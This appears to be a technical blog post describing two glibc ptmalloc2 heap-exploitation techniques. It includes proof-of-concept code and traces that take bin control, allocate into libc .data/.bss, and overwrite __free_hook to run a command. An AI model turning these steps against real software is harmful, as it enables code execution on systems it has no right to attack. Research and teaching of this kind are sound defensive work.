FR EN

From Heap to RIP

I know, I know. With every new paper/post/challenge around ptmalloc2 if feels like everything has been said. And yes, one rarely needs to understand the Malloc Maleficarum to exploit a heap bug. Neither does one need to get PC control from wizardly metadata overwrites to exploit applications where function pointers, indexed arrays and the like already live on the heap.

Nowadays exploiting heap structures is often nothing more than finding a way to overwrite interesting structures residing on the heap, by having old chunks overwritten or new chunks allocated within areas under attacker control. Pure heap exploits have been discarded as almost impossible for quite a few years now.

So, what about this application where you have a full unbounded overflow on the heap but no interesting data structure worth targeting? Well, with glibc's malloc it may still be generically exploitable for code execution if it provides good enough heap massaging primitives.


Disclaimer

Of course, we are not talking about a one-shot unlink() anymore. The two example techniques I will expose here require a strong control of the heap and several malloc/free/metadata overwrites to reach our goal.

By strong control, I mean having initial control (write) over an area of the heap spanning a few chunks and further perform arbitrary free/malloc sequences. Free can be performed on any address previously returned by malloc and we need to be able to normally write into newly allocated chunks (but don't require special control over the size of allocations).

If we don't have a libc leak, we need to add to that the ability to read into a free chunk, or an allocated chunk that hasn't been initialized at some point.


A ptmalloc2 refresher

The global algorithm of ptmalloc2, the structure of heap chunks and the type of chunks have been described many, many, many times (and more) so I'll consider this as a pre-requisite to understanding what follows. What I feel hasn't been described as many times is what goes on within the blackbox of malloc, i.e. what the unsorted chunks list is, what the small and large bins are, how malloc chooses chunks to return, etc.

As one may know, free() is a fairly quick operation. Its main purpose is to place the newly freed chunk into the "unsorted chunks" doubly-linked list. It may also merge that chunk with the chunks right before and after if they were already free, after having unlinked those from the freelists they were in. The resulting chunk finishes up in the unsorted chunk list in any case.

The unsorted chunks list is a temporary list, where all kind of free chunks await to be "sorted" into bins. bins are doubly-linked list as well, and each bin is tied to a size range. The bin associated with the requested size is generally checked first by malloc to allow for an efficient allocation.

All of this is done in malloc(). When malloc is called, it tries different strategies to get a big enough memory space to fit the allocation request. At a high level, its strategy is, in order:

  • requested size is a fast chunk: try to get a chunk out of the free fast bins list
  • requested size is a small chunk: try to get a chunk out of the small bin of that size
  • until unsorted list is empty, get next unsorted chunk
    • if requested size is small, if that chunk is the remainder of the chunk that was last split, and that chunk is big enough, return it ("last_remainder")
    • if the chunk is of the same size as the size requested, return it
    • otherwise insert the chunk in the bin associated with its size
  • try all the non-empty sorted bins for larger chunks and split them if required
  • allocate from the top chunk (last chunk of the heap which is always free)

The "bins" are essentially 127 doubly-linked lists. The first one is the unsorted chunks list, then half of the remaining lists are for small bins (one for each 0x10 size), and the rest service large bin requests (with a wider range of size in each bin). Each sorted large chunk is on a secondary doubly-linked list, which sorts chunks in a large bin by size (that way malloc only has to check the first chunk of each bin to know if the bin can satisfy the request).

Memory-wise, these structures live in the malloc_state of the current arena. The main arena lives in libc's .data section and this will be the case for most non-threaded applications.

Getting forged addresses into the freelists is easy, but getting them out is a different story. Something interesting is that chunks need to satisfy different conditions to be taken out of the different free lists. In particular:

  • a chunk out of the unsorted chunks list needs to have a size > 0x10 and smaller than the total amount of memory allocated in the current heap
  • a chunk out of a sorted bin needs to have a valid linked list in its bk field (i.e. chunk->bk->fd == chunk)
  • a chunk out of a "generic" freelist (which can be any of the above) needs to have both of its fields being valid linked lists (i.e. chunk->bk->fd == chunk and chunk->fd->bk == chunk), plus a coherent next prev_size field (the latest hardening measure). This is the infamous "unlink" macro.

I'll now outline two techniques which will take advantage of these "inconsistencies" to achieve arbitrary code execution. In both cases our aim is to obtain control of the memory area where the sorted bin that will be used for the next allocation request is.


Technique 1: returning the unsorted_chunks chunk

The main thing that I leverage in this post is the fact that getting a chunk out of the sorted bins only requires that chunk to be part of a valid linked list. This is particularly interesting when taking into account that the malloc_state of the arena itself has many memory addresses with correctly linked chunks in the form of bins.

In this first technique, we will also use the fact that unlinking a chunk from the unsorted chunks list sets chunk->bk->fd to the unsorted list chunk itself without further checks. We can leverage this to insert the unsorted list chunk in a sorted bin and get it out with the next alloc (the linked list condition will be satisfied unless the unsorted chunk is corrupted from previous allocs).

When controlling the unsorted chunks chunk and the first few small bins, we can get another chunk farther away in the bss as long as we can set its size to match the next allocation. By repeating this process we can control any bin.


Proof of Concept #1

I abstracted out the vulnerable application, structure offsets as well as reading and writing memory into wrapper classes, so that the snippets hereafter read as near pseudocode (hopefully). Also, for the sake of readability I assume that the initial heap bug (double free, use-after-free, overflow) + the ability to read/write into chunks and free them gets us free reign over chunks' metadata (excluding the first chunk under our control). This can be done in a variety of ways depending on the original bug and I feel proving this would unnecessarily contextualize the techniques here. However we won't read/write out of bounds of the initially controlled area or new chunks. I use fixed size allocations of 0x300 bytes, not very important but I feel it makes the technique more generic without inducing significant hurdles.

For each snippet I also report debug traces to show what happens at a lower level.

First things first, we allocate 5 small chunks on the heap and free the 2nd and 4th ones to get libc and heap leaks. Note that, since no chunk is free at that point, the libc leak is the address of the "top" field of the arena's malloc_state. This is also the chunk address of the unsorted chunks list (unsorted_chunks->fd - 0x10). We actually don't need the heap leak, but since it's there..

print "## Init"
heap = Heap(read, write)  # R/W primitives
chunks = [Chunk(heap, malloc(0x300)) for _ in xrange(5)]
print

print "## Getting unsorted chunks address"
free(chunks[1])
free(chunks[3])
unsorted_leak = chunks[1].fd
heap_leak = chunks[1].bk  # chunks[3]
libc_base = (unsorted_leak & ~0xfff) - LIBC_DATA_FIRST_PAGE
heap.init_from_unsorted_leak(unsorted_leak)
malloc(0x300)  # re-allocate them
malloc(0x300)
print

small_bin_0x300 = heap.get_bin_chunk(heap.smallbin_index(0x300))
small_bin_0x310 = heap.get_bin_chunk(heap.smallbin_index(0x310))
small_bin_0x320 = heap.get_bin_chunk(heap.smallbin_index(0x320))
## Init
malloc(0x300) => 0x214f010
malloc(0x300) => 0x214f320
malloc(0x300) => 0x214f630
malloc(0x300) => 0x214f940
malloc(0x300) => 0x214fc50

## Getting unsorted chunks address
free(0x214f320)
free(0x214f940)
malloc(0x300) => 0x214f320
malloc(0x300) => 0x214f940
Libc @ 0x7ff011ce2000, heap at 0x214f000

When taking the chunk out the unsorted bin, we have a chunk->bk->fd = &unsorted_chunks, which is why we can get the unsorted_chunks address written almost anywhere. If we get it written to the right small bin, the next allocation will return a pointer to the unsorted_chunks chunk's fd field.

print "##  Getting unsorted_chunks in and out of the bin"
free(chunks[1])
chunks[1].bk = small_bin_0x310.data - 8
malloc(0x300)
print "- Unsorted chunks"
heap.unsorted_chunks.dump(True)
print "- Smallbin 0x310"
small_bin_0x310.dump(True)
bss_chunk = Chunk(heap, malloc(0x300))  # Unsorted chunks
##  Getting unsorted_chunks in and out of the bin
free(0x214f320)
0x214f310->bk = 0x7ff01207be60
malloc(0x300) => 0x214f320
- Unsorted chunks
 -> Chunk @ 0x7ff01207bb58
    fd = 0x214f310
    bk = 0x7ff01207be60
- Smallbin 0x310
 -> Chunk @ 0x7ff01207be58
    fd = 0x7ff01207be58
    bk = 0x7ff01207bb58
malloc(0x300) => 0x7ff01207bb68

From there, we can take advantage of the fact that we control the unsorted_chunks list, and that getting a chunk out of that list only requires the chunk to match the next requested size:

print "##  Getting a chunk farther away in the bss"
bss_chunk.fd = bss_chunk.data+0x280
bss_chunk.bk = bss_chunk.data+0x280
# Straight out of unsorted chunks if size matches next alloc
bss_chunk.set_qword_at_offset(0x288, 0x311)
bss_chunk_2 = Chunk(heap, malloc(0x300))
##  Getting a chunk farther away in the bss
0x7ff01207bb58->fd = 0x7ff01207bde8
0x7ff01207bb58->bk = 0x7ff01207bde8
*(0x7ff01207bdf0) = 0x311
malloc(0x300) => 0x7ff01207bdf8

We can then repeat to get chunks farther away in the bss until we hit the desired small bin. At this point bss_chunk + bss_chunk_2 already span all small bins:

bss_chunk_2.write_at_offset(0, "A"*0x300)
print "- Smallbin 0x310"
small_bin_0x310.dump(True)
- Smallbin 0x310
 -> Chunk @ 0x7ff01207be58
    fd = 0x4141414141414141
    bk = 0x4141414141414141

So we have control of the sorted bin that will serve the next allocation , as well as the memory that is right after. We will actually end up in a very similar state after the next technique so we'll tackle this at the end (and you won't believe what happens next).


Technique 2: unlinking into bins

A fairly well-known consequence of the current unlink() is that any address that points to an attackers-controlled chunk can be rewritten to point to ~itself or another location that points to the same chunk. An example where this would be directly exploitable is an application that stores a table of heap addresses at a predictable location.

The idea of this 2nd technique is similar: the heap state itself contains quite a few pointers to attacker-controlled locations in the form of the bin list heads. If we can leverage this to successfully unlink() a chunk pointing to a bin, we would then get back our libc .data pointer with the next allocation

Note that in the following example I use small bins but this should be possible with any chunk type.


Proof of Concept #2

So we'll reboot the PoC exploit started in the previous section after the initialization code (i.e after the small_bin_0x320 definition).

To follow the idea explained above, we'll get the address of a chunk we control, chunks[1], into small bins of size 0x300 and 0x310. Something surprising about how chunks are gotten out of the unsorted chunks list is that it is possible to have a chunk that will be put in the sorted bin matching the current allocation, yet won't be returned when processing the unsorted chunks list. This is possible because small bins have a 0x10 granularity while chunksize() used to get the chunk's size out of unsorted bins aligns sizes to 8 bytes boundaries. Very important if the targeted application can only allocate from one bin like in our imaginary case.

print "## Inserting chunks[1] in small bin 0x300"
free(chunks[1])
free(chunks[3])
chunks[1].size = 0x301
malloc(0x300)  # This gets old chunk 3 and puts chunk 1 in bin
print "- Smallbin 0x300"
small_bin_0x300.dump(True)
print

print "##  Inserting chunks[1] in small bin 0x310"
chunks[1].size = 0x311
chunks[2].size |= 1  # Restore in-use
free(chunks[1])
free(chunks[3])
chunks[1].size |= 8  # avoid the chunk being returned
malloc(0x300)
print "- Smallbin 0x310"
small_bin_0x310.dump(True)
print
## Inserting chunks[1] in small bin 0x300
free(0xaa3320)
free(0xaa3940)
0xaa3310->size = 0x301
malloc(0x300) => 0xaa3940
- Smallbin 0x300
 -> Chunk @ 0x7f4935721e48
    fd = 0xaa3310
    bk = 0xaa3310

##  Inserting chunks[1] in small bin 0x310
0xaa3310->size = 0x311
0xaa3620->size = 0x311
free(0xaa3320)
free(0xaa3940)
0xaa3310->size = 0x319
malloc(0x300) => 0xaa3940
- Smallbin 0x310
 -> Chunk @ 0x7f4935721e58
    fd = 0xaa3310
    bk = 0xaa3310

They do not have to be consecutive, but having two separate places with our attacker-controlled address allows us to perform an unlink which does not only empty the target bin. We craft chunks[1] to have its fields pointing to the two bins and satisfy the unlink preconditions, and free chunks[0] to trigger forward coalescing into chunks[1]. chunks[2]->size does not have PREV_INUSE from the last round of frees.

print "## Unlinking chunks[1] to set small bin 0x310 ->bk"
chunks[1].size = 0x311
# FD points to SB(310), FD->bk is SB(310)->bk (our target)
# BK points to SB(300), BK->fd is SB(300)->fd (value it receives)
chunks[1].bk = small_bin_0x300
chunks[1].fd = small_bin_0x310
free(chunks[0])  # coalesced forward into chunks[1]
print "- Smallbin for 0x300 allocs"
small_bin_0x300.dump(True)
print "- Smallbin for 0x310 allocs"
small_bin_0x310.dump(True)
print
## Unlinking chunks[1] to set small bin 0x310 ->bk
0xaa3310->size = 0x311
0xaa3310->bk = 0x7f4935721e48
0xaa3310->fd = 0x7f4935721e58
free(0xaa3010)
- Smallbin for 0x300 allocs
 -> Chunk @ 0x7f4935721e48
    fd = 0x7f4935721e58
    bk = 0xaa3310
- Smallbin for 0x310 allocs
 -> Chunk @ 0x7f4935721e58
    fd = 0xaa3310
    bk = 0x7f4935721e48

As we can see on the trace above, the first chunk in the bin (0x7f4935721e48 here) is the chunk address of the 0x300 bin (if we had only used the 0x310 small bin, the bk field would have become 0x7f4935721e58 and the bin would have been considered empty).

The small bin 0x310 will be checked first to satisfy 0x300 allocs, we can therefore get the 0x7f4935721e48 chunk directly out:

print "## Getting chunk pointing to small bin 0x300 out of bin 0x310"
chunks[1].fd = small_bin_0x300
bss_chunk = Chunk(heap, malloc(0x300))
print
## Getting chunk pointing to small bin 0x300 out of bin 0x310
0xaa3310->fd = 0x7f4935721e48
malloc(0x300) => 0x7f4935721e58

We're back at the same level of control than with the first PoC: we control the bin that will serve the next allocation and the surrounding memory.


From bin control to arbitrary code execution

There are probably many ways to finish up from that point, here I'll use the last_remainder mechanism outlined above when explaining how chunks get out of the unsorted chunks list.

The idea I chose is to recreate fake chunks in the controlled section of libc memory and control which addresses are returned by malloc() through the sorted bins. Taking advantage of the last_remainder heuristic we can then allocate indefinitely from libc's .data, and then .bss sections. The bss has many data structures that yield direct PC control, amongst which __free_hook which would be directly exploitable here.

From where we left off the two exploitations, we need to control a > 0x300 chunk if we want the last remainder to come from a chunk we controlled. The snippets hereafter are the end of PoC #2.

Since the data (fd field) of the chunk that was just returned points to the small bin 0x300 chunk (i.e. 0x10 bytes before the fd field of that bin), we can control the address of the next chunk that will come out of the bin. We can set it to an arbitrary bin farther ahead which will satisfy the chunk->bk->fd == chunk precondition if the bin is empty.

print "## Leveraging bin control to get another chunk farther away"
bss_chunk.set_qword_at_offset(0x18, small_bin_0x300.data + 0x280)
bss_chunk_2 = Chunk(heap, malloc(0x300))
print
## Leveraging bin control to get another chunk farther away
*(0x7f4935721e70) = 0x7f49357220d8
malloc(0x300) => 0x7f49357220e8

We can then craft a larger chunk that starts in bss_chunk and ends in bss_chunk_2, and add that chunk in a small bin for larger allocations. We then place that chunk into the unsorted chunks list. Upon the next allocation, if smaller bins are correctly linked and empty, malloc() will split the chunk and have its second part becoming the last_remainder.

To start from a clean state we first empty the unsorted chunks list which contains chunks[0] from the previous unlink operation.

print "## Some cleanup"
# Empty 0x310 bin and unsorted chunks
bss_chunk.set_qword_at_offset(0x18, small_bin_0x300.data)
malloc(0x300)  # chunks[0] was merged with chunks[1]
chunks[1].fd = heap.unsorted_chunks
chunks[1].bk = heap.unsorted_chunks
malloc(0x300)  # chunks[1] and empty unsorted chunks
print

print "## Set bin 0x320 as non-empty"
chunks[1].size = 0x321
chunks[2].bk = 0x311  # Restore in-use
chunks[3].bk = 0x311
free(chunks[1])
free(chunks[3])
malloc(0x300)
print "- Smallbin 0x320"
small_bin_0x320.dump(True)
print

print "## Alloc out of fake chunk in bss_chunk to control last_remainder"
# Start fake chunk within first bss chunk
# Fake chunk starts at offset 0x30 into bss_chunk
bss_chunk.set_qword_at_offset(0x28, bss_chunk.data + 0x30)  # Bin 0x320 -> bk
print "- Smallbin 0x320"
small_bin_0x320.dump(True)
fake_chunk_size = 0x380
bss_chunk.set_qword_at_offset(0x38, fake_chunk_size | 1)  # set fake size
bss_chunk_2.set_qword_at_offset(0x120, fake_chunk_size)
malloc(0x300)
print "- Last remainder:", hex(heap.last_remainder)
print
## Some cleanup
*(0x7f4935721e70) = 0x7f4935721e58
malloc(0x300) => 0xaa3010
0xaa3310->fd = 0x7f4935721b58
0xaa3310->bk = 0x7f4935721b58
malloc(0x300) => 0xaa3320

## Set bin 0x320 as non-empty
0xaa3310->size = 0x321
0xaa3620->bk = 0x311
0xaa3930->bk = 0x311
free(0xaa3320)
free(0xaa3940)
malloc(0x300) => 0xaa3940
- Smallbin 0x320
 -> Chunk @ 0x7f4935721e68
    fd = 0xaa3310
    bk = 0xaa3310

## Alloc out of fake chunk in bss_chunk to control last_remainder
*(0x7f4935721e80) = 0x7f4935721e88
- Smallbin 0x320
 -> Chunk @ 0x7f4935721e68
    fd = 0xaa3310
    bk = 0x7f4935721e88
*(0x7f4935721e90) = 0x381
*(0x7f4935722208) = 0x380
malloc(0x300) => 0x7f4935721e98
- Last remainder: 0x7f4935722198

Finally, we only need to enlarge the size of the last_remainder chunk so that it encompasses the targeted libc data structures.

print "## Enlarging last_remainder and getting it in unsorted bin"
last_remainder = bss_chunk_2.chunk_at_offset(0xb0)
last_remainder.size = 0x3001
chunks[1].size = 0x311
chunks[2].size = 0x311
free(chunks[1])
chunks[1].fd = heap.last_remainder
chunks[1].bk = heap.last_remainder
malloc(0x300)
print "- Unsorted bin"
heap.unsorted_chunks.dump(True)
print
## Enlarging last_remainder and getting it in unsorted bin
0x7f4935722198->size = 0x3001
0xaa3310->size = 0x311
0xaa3620->size = 0x311
free(0xaa3320)
0xaa3310->fd = 0x7f4935722198
0xaa3310->bk = 0x7f4935722198
malloc(0x300) => 0xaa3320
- Unsorted bin
 -> Chunk @ 0x7f4935721b58
    fd = 0xaa3310
    bk = 0x7f4935722198

We can now allocate as much as we want in libc's .data and .bss until we reach whatever data structure we target. For instance, we can overwrite __free_hook and free an arbitrary chunk to gain code exec:

print "## Alloc spree to overwrite __free_hook"
last_remainder.fd = heap.unsorted_chunks
last_remainder.bk = heap.unsorted_chunks
# Alloc until __free_hook is overwriteable, fixed offset depending on the libc
malloc(0x300)
malloc(0x300)
malloc(0x300)
malloc(0x300)
malloc(0x300)
malloc(0x300)
malloc(0x300)
target = Chunk(heap, malloc(0x300))
target.set_qword_at_offset(0x70, libc_base + LIBC_SYSTEM)
chunks[1].write_at_offset(0, "id\x00")
free(chunks[1])  # RIP
## Alloc spree to overwrite __free_hook
0x7f4935722198->fd = 0x7f4935721b58
0x7f4935722198->bk = 0x7f4935721b58
malloc(0x300) => 0x7f49357221a8
malloc(0x300) => 0x7f49357224b8
malloc(0x300) => 0x7f49357227c8
malloc(0x300) => 0x7f4935722ad8
malloc(0x300) => 0x7f4935722de8
malloc(0x300) => 0x7f49357230f8
malloc(0x300) => 0x7f4935723408
malloc(0x300) => 0x7f4935723718
*(0x7f4935723788) = 0x7f49353c7450
free(0xaa3320)
uid=1000(user) gid=1000(user) groups=1000(user)

And that's it, we've been able to execute arbitrary code from a pure heap exploit and independently from the data structures on the heap. To sum up, these techniques require to be able to freely write an area of the heap that spans a few small bins, most likely through a repeatable heap bug, and then malloc/free chunks of our choosing.

This is unlikely to be useful when exploiting complex applications which often have numerous data structures and/or vtables on the heap already, but could be interesting if more common techniques cannot yield code execution and more generally to keep in mind that heap bugs are exploitable until proven otherwise.

Who knows, it might even be useful in CTFs ;)

NB: a small check has been introduced to harden the unsorted chunks list a bit. This ensures that one cannot go from a single controlled pointer to overwritten arena metadata (as shown in Technique 1), but it's obviously still possible to get the unsorted chunks list out with slightly more control.